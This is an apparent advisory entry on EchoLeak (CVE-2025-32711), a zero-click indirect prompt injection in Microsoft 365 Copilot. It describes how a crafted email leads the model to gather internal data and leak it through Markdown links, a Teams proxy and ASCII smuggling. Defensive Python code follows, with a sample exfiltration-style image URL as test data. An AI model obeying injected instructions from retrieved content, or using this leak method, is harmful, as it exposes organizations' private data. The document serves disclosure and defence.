Microsoft · M365 Copilot · CVE-2025-32711
**Name of the Vulnerable Software and Affected Versions**
Microsoft 365 Copilot (affected versions not specified)
**Description**
EchoLeak is a critical zero-click vulnerability in Microsoft 365 Copilot that allows an unauthorized remote attacker to exfiltrate sensitive organizational data from OneDrive, SharePoint, and Teams without any user interaction. The attack uses indirect prompt injection: a crafted email containing hidden instructions is sent to a target user. When that user later asks Copilot for help with a routine task, the retrieval pipeline pulls the malicious email into the model's context via Microsoft Graph, and the model follows the embedded instructions to gather internal data. The collected data is then silently exfiltrated to the attacker's server by embedding it in reference-style Markdown links or images; the exfiltration bypasses Content Security Policy (CSP) restrictions through a trusted Microsoft Teams proxy and uses ASCII smuggling to hide the payload. The root cause is a lack of data sanitization at the control level combined with a scope violation in the Retrieval-Augmented Generation (RAG) engine, which mixes untrusted external inputs with internal data in a single context.
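Two of the building blocks named above are mechanical enough to screen for on the defending side: invisible Unicode "Tags" characters (the usual carrier for ASCII smuggling) in text that is about to enter a RAG context, and reference-style or inline Markdown links and images in model output that point at hosts outside the organization. The following Python is an added example written for this entry; it is not code from the advisory, from Microsoft, or from the researchers who reported the issue. The allow-listed hosts, the sample Copilot-style output, and the hidden-text sample are all constructed for the demonstration.

```python
"""Defensive screening helpers (added example, not part of the advisory).

1. decode_ascii_smuggling(): reveals text hidden in the Unicode Tags block
   (U+E0000..U+E007F), which renders as nothing but maps 1:1 onto ASCII.
2. sanitize_markdown(): removes inline AND reference-style links/images whose
   target host is not on an allow list, so data cannot ride out in a URL.
"""
import re
from urllib.parse import urlparse

TAG_BLOCK_START, TAG_BLOCK_END = 0xE0000, 0xE007F

# Constructed allow list: only hosts the organization actually serves content from.
ALLOWED_HOSTS = {"intranet.example.com"}

INLINE_LINK = re.compile(r'!?\[([^\]]*)\]\((\S+?)(?:\s+"[^"]*")?\)')   # [t](url) / ![a](url)
REF_DEF = re.compile(r'^[ \t]*\[([^\]]+)\]:[ \t]*(\S+).*$', re.MULTILINE)  # [ref]: url
REF_USE = re.compile(r'!?\[([^\]]*)\]\[([^\]]*)\]')                    # [t][ref] / ![a][ref]


def decode_ascii_smuggling(text):
    """Split text into (visible, hidden). Each Tags-block code point is shifted
    back by 0xE0000 to the ASCII character it encodes. A non-empty hidden part
    in retrieved content is a strong signal that the content should not reach
    the model verbatim."""
    visible, hidden = [], []
    for ch in text:
        cp = ord(ch)
        if TAG_BLOCK_START <= cp <= TAG_BLOCK_END:
            hidden.append(chr(cp - TAG_BLOCK_START))
        else:
            visible.append(ch)
    return "".join(visible), "".join(hidden)


def host_allowed(url, allowed_hosts):
    """Conservative: only https URLs whose hostname is explicitly allow-listed pass.
    Relative URLs, other schemes and unknown hosts are all rejected."""
    parsed = urlparse(url)
    return parsed.scheme == "https" and parsed.hostname in allowed_hosts


def sanitize_markdown(markdown, allowed_hosts=frozenset(ALLOWED_HOSTS)):
    """Return (clean_markdown, blocked_urls). Links/images to non-allow-listed
    hosts are reduced to their visible text so no request is ever issued."""
    blocked = []

    # 1. Reference definitions: decide per label, then drop the bad definitions.
    defs = {m.group(1).lower(): m.group(2) for m in REF_DEF.finditer(markdown)}
    bad_refs = {ref for ref, url in defs.items() if not host_allowed(url, allowed_hosts)}
    blocked.extend(defs[r] for r in sorted(bad_refs))
    markdown = REF_DEF.sub(lambda m: "" if m.group(1).lower() in bad_refs else m.group(0), markdown)

    # 2. Reference usages: "[text][]" uses the text itself as the label.
    def fix_use(m):
        ref = (m.group(2) or m.group(1)).lower()
        return m.group(1) if ref in bad_refs else m.group(0)
    markdown = REF_USE.sub(fix_use, markdown)

    # 3. Inline links and images.
    def fix_inline(m):
        if host_allowed(m.group(2), allowed_hosts):
            return m.group(0)
        blocked.append(m.group(2))
        return m.group(1)
    markdown = INLINE_LINK.sub(fix_inline, markdown)
    return markdown, blocked


# Constructed sample of assistant output: one internal link, one external image
# whose query string carries data that should never leave the tenant.
SAMPLE_OUTPUT = (
    "Here is the summary you asked for.\n\n"
    "See the [quarterly plan][plan] and ![chart][c1].\n\n"
    "[plan]: https://intranet.example.com/plans/q3\n"
    "[c1]: https://external.example.net/img.png?d=secret-budget\n"
)

if __name__ == "__main__":
    clean, blocked = sanitize_markdown(SAMPLE_OUTPUT)
    print(clean)
    print("blocked:", blocked)
    sample = "Hello" + "".join(chr(TAG_BLOCK_START + ord(c)) for c in "abc")
    print(decode_ascii_smuggling(sample))
```

The sanitizer deliberately handles reference-style definitions separately from inline links, because a filter that only looks for `[text](url)` misses the `[ref]: url` form the description mentions; it also rewrites the usage site rather than leaving a dangling reference. The hidden-text decoder is meant to run on retrieved content before it is placed in the model's context, not on user prompts alone.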
**Recommendations**
At the time of writing, no information is available about a newer version that contains a fix for this vulnerability.